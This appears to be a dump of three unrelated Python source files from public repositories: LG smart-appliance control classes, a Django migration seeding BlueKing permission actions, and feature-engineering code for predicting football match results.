CLOTHING_DRY = "@AP_MAIN_MID_OPMODE_CLOTHING_DRY_W"
IONIZER = "@AP_MAIN_MID_OPMODE_IONIZER_W"
class DEHUMWindStrength(enum.Enum):
LOW = "@AP_MAIN_MID_WINDSTRENGTH_DHUM_LOW_W"
HIGH = "@AP_MAIN_MID_WINDSTRENGTH_DHUM_HIGH_W"
class DEHUMAIRREMOVAL(enum.Enum):
OFF = "@AP_OFF_W"
ON = "@AP_ON_W"
class DIAGCODE(enum.Enum):
FAN_ERROR = "@ERROR_FAN"
NORMAL = "@NORMAL"
EEPROM_ERROR = "@ERROR_EEPROM"
class DehumDevice(Device):
def set_on(self, is_on):
mode = DEHUMOperation.ON if is_on else DEHUMOperation.OFF
mode_value = self.model.enum_value('Operation', mode.value)
self._set_control('Operation', mode_value)
def set_mode(self, mode):
mode_value = self.model.enum_value('OpMode', mode.value)
self._set_control('OpMode', mode_value)
def set_humidity(self, hum):
"""Set the device's target temperature in Celsius degrees.
"""
self._set_control('HumidityCfg', hum)
def set_windstrength(self, mode):
windstrength_value = self.model.enum_value('WindStrength', mode.value)
self._set_control('WindStrength', windstrength_value)
def set_airremoval(self, is_on):
mode = DEHUMAIRREMOVAL.ON if is_on else DEHUMAIRREMOVAL.OFF
mode_value = self.model.enum_value('AirRemoval', mode.value)
self._set_control('AirRemoval', mode_value)
def monitor_start(self):
"""Start monitoring the device's status."""
self.mon = Monitor(self.client.session, self.device.id)
self.mon.start()
def monitor_stop(self):
"""Stop monitoring the device's status."""
self.mon.stop()
def delete_permission(self):
self._delete_permission()
def poll(self):
"""Poll the device's current state.
Monitoring must be started first with `monitor_start`. Return
either an `ACStatus` object or `None` if the status is not yet
available.
"""
data = self.mon.poll()
if data:
res = self.model.decode_monitor(data)
"""
with open('/config/wideq/dehumidifier_polled_data.json','w', encoding="utf-8") as dumpfile:
json.dump(res, dumpfile, ensure_ascii=False, indent="\t")
"""
return DEHUMStatus(self, res)
else:
return None
class DEHUMStatus(object):
"""Higher-level information about an AC device's current status.
"""
def __init__(self, dehum, data):
self.dehum = dehum
self.data = data
def lookup_enum(self, key):
return self.dehum.model.enum_name(key, self.data[key])
@property
def is_on(self):
op = DEHUMOperation(self.lookup_enum('Operation'))
return op == DEHUMOperation.ON
@property
def mode(self):
return DEHUMOPMode(self.lookup_enum('OpMode'))
@property
def windstrength_state(self):
return DEHUMWindStrength(self.lookup_enum('WindStrength'))
@property
def airremoval_state(self):
return DEHUMAIRREMOVAL(self.lookup_enum('AirRemoval'))
@property
def current_humidity(self):
return self.data['SensorHumidity']
@property
def target_humidity(self):
return self.data['HumidityCfg']
"""------------------for Water Purifier"""
class COCKCLEAN(enum.Enum):
WAITING = "@WP_WAITING_W"
COCKCLEANING = "@WP_COCK_CLEANING_W"
class WPDevice(Device):
def day_water_usage(self, watertype):
typeCode = 'DAY'
sDate = datetime.today().strftime("%Y%m%d")
res = self._get_water_usage(typeCode, sDate, sDate)
data = res['itemDetail']
for usage_data in data:
if usage_data['waterType'] == watertype:
return usage_data['waterAmount']
def week_water_usage(self, watertype):
typeCode = 'WEEK'
amount = 0
weekday = datetime.today().weekday()
startdate = datetime.today() + timedelta(days=-(weekday+1))
enddate = datetime.today() + timedelta(days=(6-(weekday+1)))
sDate = datetime.date(startdate).strftime("%Y%m%d")
eDate = datetime.date(enddate).strftime("%Y%m%d")
res = self._get_water_usage(typeCode, sDate, eDate)
for weekdata in res:
for usage_data in weekdata['itemDetail']:
if usage_data['waterType'] == watertype:
amount = amount + int(usage_data['waterAmount'])
return amount
def month_water_usage(self, watertype):
typeCode = 'MONTH'
startdate = datetime.today().replace(day=1)
sDate = datetime.date(startdate).strftime("%Y%m%d")
eDate = datetime.today().strftime("%Y%m%d")
res = self._get_water_usage(typeCode, sDate, eDate)
data = res['itemDetail']
for usage_data in data:
if usage_data['waterType'] == watertype:
return usage_data['waterAmount']
def year_water_usage(self, watertype):
typeCode = 'YEAR'
startdate = datetime.today().replace(month=1, day=1)
sDate = datetime.date(startdate).strftime("%Y%m%d")
eDate = datetime.today().strftime("%Y%m%d")
res = self._get_water_usage(typeCode, sDate, eDate)
data = res['itemDetail']
for usage_data in data:
if usage_data['waterType'] == watertype:
return usage_data['waterAmount']
def monitor_start(self):
"""Start monitoring the device's status."""
self.mon = Monitor(self.client.session, self.device.id)
self.mon.start()
def monitor_stop(self):
"""Stop monitoring the device's status."""
self.mon.stop()
def delete_permission(self):
self._delete_permission()
def poll(self):
"""Poll the device's current state.
Monitoring must be started first with `monitor_start`. Return
either an `ACStatus` object or `None` if the status is not yet
available.
"""
data = self.mon.poll()
if data:
res = self.model.decode_monitor(data)
"""
with open('/config/wideq/waterpurifier_polled_data.json','w', encoding="utf-8") as dumpfile:
json.dump(cockclean, dumpfile, ensure_ascii=False, indent="\t")
"""
return WPStatus(self, res)
else:
return None
class WPStatus(object):
def __init__(self, wp, data):
self.wp = wp
self.data = data
def lookup_enum(self, key):
return self.wp.model.enum_name(key, self.data[key])
@property
def cockclean_state(self):
return COCKCLEAN(self.lookup_enum('CockClean'))
"""------------------for Air Purifier"""
class APOperation(enum.Enum):
ON = "@operation_on"
OFF = "@operation_off"
class APOPMode(enum.Enum):
CLEANBOOSTER = "@AP_MAIN_MID_OPMODE_CIRCULATOR_CLEAN_W"
SINGLECLEAN = "@AP_MAIN_MID_OPMODE_BABY_CARE_W"
CLEAN = "@AP_MAIN_MID_OPMODE_CLEAN_W"
DUALCLEAN = "@AP_MAIN_MID_OPMODE_DUAL_CLEAN_W"
AUTO = "@AP_MAIN_MID_OPMODE_AUTO_W"
class APWindStrength(enum.Enum):
LOWST_LOW = "@AP_MAIN_MID_WINDSTRENGTH_LOWST_LOW_W"
LOWST = "@AP_MAIN_MID_WINDSTRENGTH_LOWST_W"
LOW = "@AP_MAIN_MID_WINDSTRENGTH_LOW_W"
LOW_MID = "@AP_MAIN_MID_WINDSTRENGTH_LOW_MID_W"
MID = "@AP_MAIN_MID_WINDSTRENGTH_MID_W"
MID_HIGH = "@AP_MAIN_MID_WINDSTRENGTH_MID_HIGH_W"
HIGH = "@AP_MAIN_MID_WINDSTRENGTH_HIGH_W"
POWER = "@AP_MAIN_MID_WINDSTRENGTH_POWER_W"
AUTO = "@AP_MAIN_MID_WINDSTRENGTH_AUTO_W"
LONGPOWER = "@AP_MAIN_MID_WINDSTRENGTH_LONGPOWWER_W"
SHOWER = "@AP_MAIN_MID_WINDSTRENGTH_SHOWER_W"
FOREST = "@AP_MAIN_MID_WINDSTRENGTH_FOREST_W"
TURBO = "@AP_MAIN_MID_WINDSTRENGTH_TURBO_W"
FASTWIND = "@AP_MAIN_MID_WINDSTRENGTH_FASTWIND_W"
class APCirculateStrength(enum.Enum):
NOT_SUPPORTED = "@NON"
LOWST_LOW = '@AP_MAIN_MID_CIRCULATORSTRENGTH_LOWST_LOW_W'
LOWST = "@AP_MAIN_MID_CIRCULATORSTRENGTH_LOWST_W"
LOW = "@AP_MAIN_MID_CIRCULATORSTRENGTH_LOW_W"
LOW_MID = "@AP_MAIN_MID_CIRCULATORSTRENGTH_LOW_MID_W"
MID = "@AP_MAIN_MID_CIRCULATORSTRENGTH_MID_W"
MID_HIGH = "@AP_MAIN_MID_CIRCULATORSTRENGTH_MID_HIGH_W"
HIGH = "@AP_MAIN_MID_CIRCULATORSTRENGTH_HIGH_W"
POWER = "@AP_MAIN_MID_CIRCULATORSTRENGTH_POWER_W"
AUTO = "@AP_MAIN_MID_CIRCULATORSTRENGTH_AUTO_W"
LINK = "@AP_MAIN_MID_CIRCULATORSTRENGTH_LINK_W"
class APETCMODE(enum.Enum):
NOT_SUPPORT = "@NONSUPPORT"
OFF = "@AP_OFF_W"
ON = "@AP_ON_W"
class APTOTALAIRPOLUTION(enum.Enum):
NOT_SUPPORT = '0'
GOOD = '1'
NORMAL = '2'
BAD = '3'
VERYBAD = '4'
class APSMELL(enum.Enum):
NOT_SUPPORT = '0'
WEEK = '1'
NORMAL = '2'
STRONG = '3'
VERYSTRONG = '4'
class APDevice(Device):
def set_on(self, is_on):
mode = APOperation.ON if is_on else APOperation.OFF
mode_value = self.model.enum_value('Operation', mode.value)
self._set_control('Operation', mode_value)
def set_mode(self, mode):
mode_value = self.model.enum_value('OpMode', mode.value)
self._set_control('OpMode', mode_value)
def set_windstrength(self, mode):
windstrength_value = self.model.enum_value('WindStrength', mode.value)
self._set_control('WindStrength', windstrength_value)
def set_circulatestrength(self, mode):
circulatestrength_value = self.model.enum_value('CirculateStrength', mode.value)
self._set_control('CirculateStrength', circulatestrength_value)
def set_circulatedir(self, is_on):
mode = APETCMODE.ON if is_on else APETCMODE.OFF
mode_value = self.model.enum_value('CirculateDir', mode.value)
self._set_control('CirculateDir', mode_value)
def set_airremoval(self, is_on):
mode = APETCMODE.ON if is_on else APETCMODE.OFF
mode_value = self.model.enum_value('AirRemoval', mode.value)
self._set_control('AirRemoval', mode_value)
def set_signallighting(self, is_on):
mode = APETCMODE.ON if is_on else APETCMODE.OFF
mode_value = self.model.enum_value('SignalLighting', mode.value)
self._set_control('SignalLighting', mode_value)
def set_airfast(self, is_on):
mode = APETCMODE.ON if is_on else APETCMODE.OFF
mode_value = self.model.enum_value('AirFast', mode.value)
self._set_control('AirFast', mode_value)
def get_filter_state(self):
"""Get information about the filter."""
return self._get_config('Filter')
def monitor_start(self):
"""Start monitoring the device's status."""
self.mon = Monitor(self.client.session, self.device.id)
self.mon.start()
def monitor_stop(self):
"""Stop monitoring the device's status."""
self.mon.stop()
def delete_permission(self):
self._delete_permission()
def poll(self):
"""Poll the device's current state.
Monitoring must be started first with `monitor_start`. Return
either an `ACStatus` object or `None` if the status is not yet
available.
"""
data = self.mon.poll()
if data:
res = self.model.decode_monitor(data)
"""
with open('/config/wideq/airpurifier_polled_data.json','w', encoding="utf-8") as dumpfile:
json.dump(res, dumpfile, ensure_ascii=False, indent="\t")
"""
return APStatus(self, res)
else:
return None
class APStatus(object):
def __init__(self, ap, data):
self.ap = ap
self.data = data
def lookup_enum(self, key):
return self.ap.model.enum_name(key, self.data[key])
@property
def is_on(self):
op = APOperation(self.lookup_enum('Operation'))
return op == APOperation.ON
@property
def mode(self):
return APOPMode(self.lookup_enum('OpMode'))
@property
def support_oplist(self):
dict_support_opmode = self.ap.model.option_item('SupportOpMode')
support_opmode = []
for option in dict_support_opmode.values():
support_opmode.append(APOPMode(option).name)
return support_opmode
@property
def windstrength_state(self):
return APWindStrength(self.lookup_enum('WindStrength'))
@property
def circulatestrength_state(self):
return APCirculateStrength(self.lookup_enum('CirculateStrength'))
@property
def circulatedir_state(self):
return APETCMODE(self.lookup_enum('CirculateDir'))
@property
def airremoval_state(self):
return APETCMODE(self.lookup_enum('AirRemoval'))
@property
def signallighting_state(self):
return APETCMODE(self.lookup_enum('SignalLighting'))
@property
def airfast_state(self):
return APETCMODE(self.lookup_enum('AirFast'))
@property
def sensorpm1(self):
return self.data['SensorPM1']
@property
def sensorpm2(self):
return self.data['SensorPM2']
@property
def sensorpm10(self):
return self.data['SensorPM10']
@property
def total_air_polution(self):
return APTOTALAIRPOLUTION(self.data['TotalAirPolution'])
@property
def air_polution(self):
return APSMELL(self.data['AirPolution'])
| callelonnberg/wideq | wideq.py | wideq.py | py | 89,830 | python | en | code | 0 | github-code | 13 |
14230557337 | import json
from django.db import migrations
from backend.util.json import json_dumps
def init_aggregate_action(apps, schema_editor):
AggregateAction = apps.get_model("action", "AggregateAction")
aas = []
for agg_action in _default_aggregate_actions:
aa = AggregateAction(
system_id=agg_action["system_id"],
_action_ids=json_dumps(agg_action["action_ids"]),
_aggregate_resource_type=json_dumps(agg_action["aggregate_resource_type"]),
)
aas.append(aa)
AggregateAction.objects.bulk_create(aas)
class Migration(migrations.Migration):
dependencies = [
("action", "0001_initial"),
]
operations = [
migrations.RunPython(init_aggregate_action),
]
_default_aggregate_actions = [
{
"system_id": "bk_bcs_app",
"action_ids": ["project_view", "project_edit"],
"aggregate_resource_type": {"system_id": "bk_bcs_app", "id": "project"},
},
{
"system_id": "bk_cmdb",
"action_ids": [
"find_business_resource",
"edit_biz_host",
"create_biz_topology",
"edit_biz_topology",
"delete_biz_topology",
"create_biz_service_instance",
"edit_biz_service_instance",
"delete_biz_service_instance",
"create_biz_service_template",
"edit_biz_service_template",
"delete_biz_service_template",
"create_biz_set_template",
"edit_biz_set_template",
"delete_biz_set_template",
"create_biz_service_category",
"edit_biz_service_category",
"delete_biz_service_category",
"create_biz_dynamic_query",
"edit_biz_dynamic_query",
"delete_biz_dynamic_query",
"edit_biz_custom_field",
"edit_biz_host_apply",
"edit_business",
"archive_business",
"find_business",
],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "biz"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["create_resource_pool_host", "edit_resource_pool_directory", "delete_resource_pool_directory",],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_resource_pool_directory"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_resource_pool_host", "delete_resource_pool_host",],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_host_rsc_pool_directory"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["create_sys_instance", "edit_sys_instance", "delete_sys_instance"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_instance_model"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_cloud_account", "delete_cloud_account", "find_cloud_account"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_cloud_account"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_cloud_resource_task", "delete_cloud_resource_task", "find_cloud_resource_task"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_cloud_resource_task"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_cloud_area", "delete_cloud_area"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_cloud_area"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_event_subscription", "delete_event_subscription", "find_event_subscription"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_event_pushing"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_model_group", "delete_model_group"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_model_group"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_sys_model", "delete_sys_model"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_model"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_association_type", "delete_association_type"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_association_type"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_biz_sensitive", "find_biz_sensitive"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "biz_sensitive"},
},
{
"system_id": "bk_itsm",
"action_ids": [
"project_view",
"project_edit",
"system_settings_manage",
"service_create",
"service_manage",
"sla_manage",
"workflow_create",
"workflow_manage",
"workflow_deploy",
"flow_version_restore",
"flow_version_manage",
"flow_element_manage",
"role_create",
"role_manage",
"ticket_view",
],
"aggregate_resource_type": {"system_id": "bk_itsm", "id": "project"},
},
{
"system_id": "bk_job",
"action_ids": [
"access_business",
"quick_execute_script",
"quick_transfer_file",
"execute_script",
"create_script",
"view_script",
"manage_script",
"create_job_template",
"view_job_template",
"edit_job_template",
"delete_job_template",
"debug_job_template",
"launch_job_plan",
"create_job_plan",
"view_job_plan",
"edit_job_plan",
"delete_job_plan",
"sync_job_plan",
"create_tag",
"manage_tag",
"create_cron",
"manage_cron",
"view_history",
"notification_setting",
"create_account",
"manage_account",
],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "biz"},
},
{
"system_id": "bk_log_search",
"action_ids": [
"view_business",
"search_log",
"create_indices",
"manage_indices",
"create_collection",
"view_collection",
"manage_collection",
"create_es_source",
"manage_es_source",
"view_dashboard",
"manage_dashboard",
"manage_extract_config",
],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "biz"},
},
{
"system_id": "bk_monitorv3",
"action_ids": [
"view_business",
"view_home",
"view_dashboard",
"manage_dashboard",
"view_host",
"view_synthetic",
"manage_synthetic",
"view_event",
"view_plugin",
"manage_plugin",
"view_collection",
"manage_collection",
"view_rule",
"manage_rule",
"view_notify_team",
"manage_notify_team",
"view_downtime",
"manage_downtime",
"view_custom_metric",
"manage_custom_metric",
"view_custom_event",
"manage_custom_event",
"export_config",
"import_config",
"view_service_category",
"manage_upgrade",
"view_function_switch",
"manage_function_switch",
"explore_metric",
"manage_host",
],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "biz"},
},
{
"system_id": "bk_sops",
"action_ids": [
"project_view",
"project_edit",
"project_fast_create_task",
"flow_create",
"flow_view",
"flow_edit",
"flow_delete",
"flow_create_task",
"flow_create_mini_app",
"flow_create_periodic_task",
"task_view",
"task_operate",
"task_edit",
"task_claim",
"task_delete",
"task_clone",
"mini_app_view",
"mini_app_edit",
"mini_app_delete",
"mini_app_create_task",
"periodic_task_view",
"periodic_task_edit",
"periodic_task_delete",
],
"aggregate_resource_type": {"system_id": "bk_sops", "id": "project"},
},
{
"system_id": "bk_sops",
"action_ids": ["common_flow_delete", "common_flow_edit", "common_flow_view"],
"aggregate_resource_type": {"system_id": "bk_sops", "id": "common_flow"},
},
{
"system_id": "bk_ci",
"action_ids": [
"project_view",
"project_edit",
"project_delete",
"project_manage",
"pipeline_view",
"pipeline_edit",
"pipeline_create",
"pipeline_download",
"pipeline_delete",
"pipeline_share",
"pipeline_execute",
"repertory_view",
"repertory_edit",
"repertory_create",
"repertory_delete",
"repertory_use",
"credential_view",
"credential_edit",
"credential_create",
"credential_delete",
"credential_use",
"cert_view",
"cert_edit",
"cert_create",
"cert_delete",
"cert_use",
"environment_view",
"environment_edit",
"environment_create",
"environment_delete",
"environment_use",
"env_node_view",
"env_node_edit",
"env_node_create",
"env_node_delete",
"env_node_use",
],
"aggregate_resource_type": {"system_id": "bk_ci", "id": "project"},
},
{
"system_id": "bk_nodeman",
"action_ids": [
"agent_view",
"agent_operate",
"proxy_operate",
"plugin_view",
"plugin_operate",
"task_history_view",
],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "biz"},
},
{
"system_id": "bk_nodeman",
"action_ids": ["cloud_edit", "cloud_delete", "cloud_view"],
"aggregate_resource_type": {"system_id": "bk_nodeman", "id": "cloud"},
},
{
"system_id": "bk_nodeman",
"action_ids": ["ap_delete", "ap_edit", "ap_view"],
"aggregate_resource_type": {"system_id": "bk_nodeman", "id": "ap"},
},
]
| TencentBlueKing/bk-iam-saas | saas/backend/apps/action/migrations/0002_auto_20200812_1159.py | 0002_auto_20200812_1159.py | py | 10,685 | python | en | code | 24 | github-code | 13 |
1951632795 | import sqlite3
import pandas as pd
import numpy as np
import os.path
import seaborn as sns
import itertools
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn import metrics
from sklearn import svm
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression
from sklearn import model_selection
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import train_test_split
from time import time
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import cross_val_predict
from sklearn.svm import SVC
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
import warnings
warnings.simplefilter("ignore")
#check
# ----------------------------------------------------------------------------------------------------------------------
# -------------------------------------- Gets players data (fifa data) for all matches ---------------------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_football_matches_data(matches, player_skills):
    """Attach the aggregated player skill ratings to every match row.

    Applies `get_players_match_skills` to each row of *matches* and reports
    how long the (potentially slow) row-wise aggregation took.

    :param matches: DataFrame of matches, one row per match.
    :param player_skills: DataFrame of dated per-player skill records.
    :return: DataFrame with one skills row per match.
    """
    print("Collecting players skills data for each match...")
    started_at = time()
    # Row-wise apply: each match row is expanded into its 22 player ratings.
    matches_total_data = matches.apply(
        lambda row: get_players_match_skills(row, player_skills), axis=1)
    elapsed_minutes = (time() - started_at) / 60
    print("Players skills for each match collected in {:.1f} minutes".format(elapsed_minutes))
    return matches_total_data
#Aggregates players skills for a given match.
def get_players_match_skills(match, players_skills):
    """Aggregate the most recent overall rating of all 22 players for one match.

    For each of the 11 home and 11 away player slots, look up that player's
    latest skill record dated strictly before the match date and take its
    ``overall_rating``. Missing players (NaN ids) contribute a rating of 0.

    :param match: Series for one match; must provide ``match_api_id``,
        ``date`` and the 22 ``home_player_N`` / ``away_player_N`` id fields.
    :param players_skills: DataFrame with ``player_api_id``, ``date`` and
        ``overall_rating`` columns.
    :return: Series with one ``<slot>_overall_rating`` entry per player slot
        plus ``match_api_id``.
    """
    match_id = match.match_api_id
    date = match['date']
    players = ['home_player_1', 'home_player_2', 'home_player_3', "home_player_4", "home_player_5",
               "home_player_6", "home_player_7", "home_player_8", "home_player_9", "home_player_10",
               "home_player_11", "away_player_1", "away_player_2", "away_player_3", "away_player_4",
               "away_player_5", "away_player_6", "away_player_7", "away_player_8", "away_player_9",
               "away_player_10", "away_player_11"]
    players_update_skills = pd.DataFrame()
    names = []

    for player in players:
        player_id = match[player]
        # All skill records for this player...
        player_skills = players_skills[players_skills.player_api_id == player_id]
        # ...narrowed to the single most recent record before the match date.
        player_skills = player_skills[player_skills.date < date].sort_values(by='date', ascending=False)[:1]

        # pd.isna handles NaN/None safely (np.isnan raises on non-float input).
        if pd.isna(player_id):
            overall_rating = pd.Series(0)
        else:
            player_skills.reset_index(inplace=True, drop=True)
            # The overall ranking skill of the player at that point in time.
            overall_rating = pd.Series(player_skills.loc[0, "overall_rating"])

        name = "{}_overall_rating".format(player)
        names.append(name)
        players_update_skills = pd.concat([players_update_skills, overall_rating], axis=1)

    players_update_skills.columns = names
    players_update_skills['match_api_id'] = match_id
    players_update_skills.reset_index(inplace=True, drop=True)
    # .iloc replaces the long-removed DataFrame.ix indexer.
    return players_update_skills.iloc[0]
# ----------------------------------------------------------------------------------------------------------------------
# -------------------------------------- Get overall players rankings --------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_overall_ranking_skills(matches_players_data, get_overall=False):
    """Select the player-skill columns of interest from the matches data.

    :param matches_players_data: DataFrame of per-match player statistics.
    :param get_overall: if True, keep only the ``*overall_rating`` columns
        (plus ``match_api_id``); otherwise keep everything except the
        ``date_stat`` columns.
    :return: the filtered DataFrame.
    """
    temp_data = matches_players_data
    if get_overall:
        # .copy() avoids pandas' SettingWithCopyWarning on the assignment below.
        data = temp_data.loc[:, matches_players_data.columns.str.contains('overall_rating')].copy()
        data.loc[:, 'match_api_id'] = temp_data.loc[:, 'match_api_id']
    else:
        # Keep all stats except the stat-date bookkeeping columns.
        cols = matches_players_data.loc[:, matches_players_data.columns.str.contains('date_stat')]
        data = temp_data.drop(cols.columns, axis=1)
    return data
# ----------------------------------------------------------------------------------------------------------------------
# -------------------------------------- Get the last x matches of a given team ----------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_last_matches(matches, date, team, x=10):
    """Return up to *x* most recent matches *team* played before *date*.

    :param matches: DataFrame of all matches.
    :param date: cut-off date; only strictly earlier matches are returned.
    :param team: team api id (matched as home or away side).
    :param x: maximum number of matches to return (newest first).
    """
    involved = (matches['home_team_api_id'] == team) | (matches['away_team_api_id'] == team)
    earlier = matches[involved & (matches.date < date)]
    # Newest first, truncated to the x most recent.
    return earlier.sort_values(by='date', ascending=False).iloc[0:x, :]
# ----------------------------------------------------------------------------------------------------------------------
# ----------------------------------- Get the last x matches of two given teams ----------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_last_matches_against_eachother(matches, date, home_team, away_team, x=10):
    """Return up to *x* most recent head-to-head matches of the two teams before *date*.

    Matches are collected regardless of which side hosted, sorted newest first.
    """
    hosted_by_home = matches[(matches['home_team_api_id'] == home_team)
                             & (matches['away_team_api_id'] == away_team)]
    hosted_by_away = matches[(matches['home_team_api_id'] == away_team)
                             & (matches['away_team_api_id'] == home_team)]
    head_to_head = pd.concat([hosted_by_home, hosted_by_away])

    earlier = head_to_head[head_to_head.date < date].sort_values(by='date', ascending=False)
    try:
        last_matches = earlier.iloc[0:x, :]
    except:
        # Fallback: fewer than x head-to-head matches exist — take them all.
        last_matches = earlier.iloc[0:head_to_head.shape[0], :]

    # Sanity check for data errors.
    if (last_matches.shape[0] > x):
        print("Error in obtaining matches")
    return last_matches
# ----------------------------------------------------------------------------------------------------------------------
# ----------------------------------- Get the goals of a specfic team from a set of matches ----------------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_goals(matches, team):
    """Total goals *team* scored across the given matches (home and away)."""
    scored_at_home = matches.home_team_goal[matches.home_team_api_id == team].sum()
    scored_away = matches.away_team_goal[matches.away_team_api_id == team].sum()
    return int(scored_at_home) + int(scored_away)
# ----------------------------------------------------------------------------------------------------------------------
# ------------------------------- Get the goals conceided of a specific team from a set of matches ---------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_goals_conceided(matches, team):
    """Total goals *team* conceded across the given matches (home and away).

    Goals conceded are the opposing side's goals: the home side's goals when
    *team* played away, plus the away side's goals when *team* played at home.
    """
    conceded_while_away = matches.home_team_goal[matches.away_team_api_id == team].sum()
    conceded_at_home = matches.away_team_goal[matches.home_team_api_id == team].sum()
    return int(conceded_while_away) + int(conceded_at_home)
# ----------------------------------------------------------------------------------------------------------------------
# ------------------------------- Get the number of wins of a specific team from a set of matches-----------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_wins(matches, team):
    """Number of matches in *matches* that *team* won (home or away)."""
    # A NaN goal value can never satisfy the strict '>' comparison, so summing
    # the boolean masks counts exactly the decided wins.
    won_at_home = ((matches.home_team_api_id == team)
                   & (matches.home_team_goal > matches.away_team_goal)).sum()
    won_away = ((matches.away_team_api_id == team)
                & (matches.away_team_goal > matches.home_team_goal)).sum()
    return int(won_at_home) + int(won_away)
# ----------------------------------------------------------------------------------------------------------------------
# ----------------------------------------Create match specific features for a given match -----------------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_match_features(match, matches, x=10):
    """Create match-specific features for a single match.

    Parameters
    ----------
    match : one row (Series) of the matches frame -- the game to featurise.
    matches : full matches DataFrame used to look up past games.
    x : recent-form window size per team.  Bug fix: the value is now
        forwarded to get_last_matches instead of a hard-coded 10, so the
        parameter actually has an effect (default preserves old behavior).

    Returns
    -------
    pandas Series with match/league ids, goal-difference features and
    win counts for the home and away team.
    """
    # Define variables
    date = match.date
    home_team = match.home_team_api_id
    away_team = match.away_team_api_id
    # Get last x matches of home and away team (x forwarded, no longer hard-coded)
    matches_home_team = get_last_matches(matches, date, home_team, x=x)
    matches_away_team = get_last_matches(matches, date, away_team, x=x)
    # Head-to-head history window stays at 4 games, as before
    last_matches_against = get_last_matches_against_eachother(matches, date, home_team, away_team, x=4)
    # Create goal variables over each team's recent games
    home_goals = get_goals(matches_home_team, home_team)
    away_goals = get_goals(matches_away_team, away_team)
    home_goals_conceided = get_goals_conceided(matches_home_team, home_team)
    away_goals_conceided = get_goals_conceided(matches_away_team, away_team)
    # Define result data frame
    result = pd.DataFrame()
    # Define ID features
    result.loc[0, 'match_api_id'] = match.match_api_id
    result.loc[0, 'league_id'] = match.league_id
    # Create match features
    result.loc[0, 'home_team_goals_difference'] = home_goals - home_goals_conceided
    result.loc[0, 'away_team_goals_difference'] = away_goals - away_goals_conceided
    result.loc[0, 'games_won_home_team'] = get_wins(matches_home_team, home_team)
    result.loc[0, 'games_won_away_team'] = get_wins(matches_away_team, away_team)
    result.loc[0, 'games_against_won'] = get_wins(last_matches_against, home_team)
    result.loc[0, 'games_against_lost'] = get_wins(last_matches_against, away_team)
    # Return the single feature row as a Series
    return result.loc[0]
# ----------------------------------------------------------------------------------------------------------------------
# -------------------------------------------Derives a label for a given match -----------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
def get_match_label_result(match):
    """Derive the result label for one match, from the home team's view.

    Returns a Series with the match_api_id and a 'label' of
    "Win" / "Draw" / "Defeat".
    """
    # Define variables
    home_goals = match['home_team_goal']
    away_goals = match['away_team_goal']
    label = pd.DataFrame()
    label.loc[0, 'match_api_id'] = match['match_api_id']
    # The three outcomes are mutually exclusive, so use a single
    # if/elif/else chain instead of three independent if-tests.
    if home_goals > away_goals:
        label.loc[0, 'label'] = "Win"
    elif home_goals == away_goals:
        label.loc[0, 'label'] = "Draw"
    else:
        label.loc[0, 'label'] = "Defeat"
    # Return label
    return label.loc[0]
#----------------------------------------------------------------------------------------------------------------------
#-------------------------------------------Converts site odds to probabilities. --------------------------------------
#----------------------------------------------------------------------------------------------------------------------
def convert_odds_to_prob(match_odds):
    """Convert one bookkeeper's decimal odds into normalised probabilities.

    Takes a frame with 'match_api_id', 'site_odd' and the three odds
    columns 'Win'/'Draw'/'Defeat'; returns a frame of the same shape in
    which the three outcome columns sum to 1 per row.
    """
    # Implied (unnormalised) probabilities are the reciprocals of the odds.
    inv_win = 1 / match_odds.loc[:, 'Win']
    inv_draw = 1 / match_odds.loc[:, 'Draw']
    inv_defeat = 1 / match_odds.loc[:, 'Defeat']
    # The reciprocals sum to slightly more than 1 (the bookkeeper margin);
    # divide by the sum so the outcome probabilities are normalised.
    overround = inv_win + inv_draw + inv_defeat
    probs = pd.DataFrame()
    probs.loc[:, 'match_api_id'] = match_odds.loc[:, 'match_api_id']
    probs.loc[:, 'site_odd'] = match_odds.loc[:, 'site_odd']
    probs.loc[:, 'Win'] = inv_win / overround
    probs.loc[:, 'Draw'] = inv_draw / overround
    probs.loc[:, 'Defeat'] = inv_defeat / overround
    return probs
